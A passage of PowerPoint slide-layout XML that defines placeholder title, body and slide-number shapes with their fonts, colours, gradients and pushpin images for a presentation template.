            <a:lvl2pPr marL="0" indent="457200" algn="ctr" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:srgbClr val="465E9C"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="914400" algn="ctr" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:srgbClr val="465E9C"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="1371600" algn="ctr" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:srgbClr val="465E9C"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="1828800" algn="ctr" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:srgbClr val="465E9C"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Body Level One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Body Level Two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:t>Body Level Three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:t>Body Level Four</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:t>Body Level Five</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Slide Number"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8837589" y="7674606"/>
            <a:ext cx="787945" cy="409449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="465E9C"/>
                </a:solidFill>
                <a:latin typeface="Rage Italic"/>
                <a:ea typeface="Rage Italic"/>
                <a:cs typeface="Rage Italic"/>
                <a:sym typeface="Rage Ital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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="508" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1" y="-1"/>
            <a:ext cx="13004801" cy="9753601"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13004800" cy="9753600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="506" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="0"/>
              <a:ext cx="10187095" cy="9753600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="010101">
                    <a:alpha val="51765"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="60000">
                  <a:srgbClr val="FEFEFE">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="-19636" t="62278" r="119636" b="37721"/>
              </a:path>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="507" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1625600" y="0"/>
              <a:ext cx="11379200" cy="9753600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="010101">
                    <a:alpha val="56000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="61000">
                  <a:srgbClr val="FEFEFE">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="62278" t="119636" r="37721" b="-19636"/>
              </a:path>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="894079" y="8631935"/>
            <a:ext cx="11265411" cy="7640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60" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10769" y="4154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21140" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="30000">
                <a:srgbClr val="010101">
                  <a:alpha val="34000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="010101">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="37721" t="-19636" r="62278" b="119636"/>
            </a:path>
          </a:gradFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040383" y="818218"/>
            <a:ext cx="10945708" cy="8128001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="139700" dist="63500" dir="5400000">
              <a:srgbClr val="000000">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040383" y="819302"/>
            <a:ext cx="10945708" cy="8128001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
          </a:blipFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="139700" dist="63500" dir="5400000">
              <a:srgbClr val="000000">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="512" name="C:\Users\Administrator\Desktop\Pushpin Dev\Assets\pushpinLeft.png" descr="C:\Users\Administrator\Desktop\Pushpin Dev\Assets\pushpinLeft.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1435684">
            <a:off x="773320" y="388395"/>
            <a:ext cx="807583" cy="807582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="513" name="C:\Users\Administrator\Desktop\Pushpin Dev\Assets\pushpinLeft.png" descr="C:\Users\Administrator\Desktop\Pushpin Dev\Assets\pushpinLeft.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="4096196">
            <a:off x="11541445" y="424053"/>
            <a:ext cx="806299" cy="806299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557365" y="1021712"/>
            <a:ext cx="9906127" cy="1992343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:defRPr sz="6200">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="6739547"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="388620" indent="-388620" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3400">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="789709" indent="-423949" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3400">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1074419" indent="-388619" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3400">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1483360" indent="-431800" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3400">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1903095" indent="-485775" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3400">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Body Level One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Body Level Two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:t>Body Level Three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:t>Body Level Four</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:t>Body Level Five</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Slide Number"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10908732" y="8316825"/>
            <a:ext cx="787945" cy="409449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="914400">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="465E9C"/>
                </a:solidFill>
                <a:latin typeface="Rage Italic"/>
                <a:ea typeface="Rage Italic"/>
                <a:cs typeface="Rage Italic"/>
                <a:sym typeface="Rage Ital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23" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2167466"/>
            <a:ext cx="11704322" cy="7586135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="379827" indent="-379827" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F3A447"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="777240" indent="-411480" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F3A447"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1169125" indent="-391885" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F3A447"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1484696" indent="-433136" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F3A447"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1840229" indent="-514349" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F3A447"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Body Level One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Body Level Two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:t>Body Level Three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:t>Body Level Four</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:t>Body Level Five</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Slide Number"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11961707" y="8932480"/>
            <a:ext cx="866987" cy="368301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FEFAC9"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="-1"/>
            <a:ext cx="11704322" cy="1950721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400">
              <a:defRPr spc="-138" sz="5800">
                <a:ln w="4419">
                  <a:solidFill>
                    <a:srgbClr val="3C4421">
                      <a:alpha val="25000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a: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532" name="Slide Number"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9320107" y="8779792"/>
            <a:ext cx="3034454" cy="520701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:defRPr b="1" sz="1600">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>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539" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="130952"/>
            <a:ext cx="11704322" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="1300480">
              <a:defRPr sz="6200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540"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1300480">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="4400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="906235" indent="-449035" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="4400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-419100" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="4400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1874520" indent="-502920" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="4400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
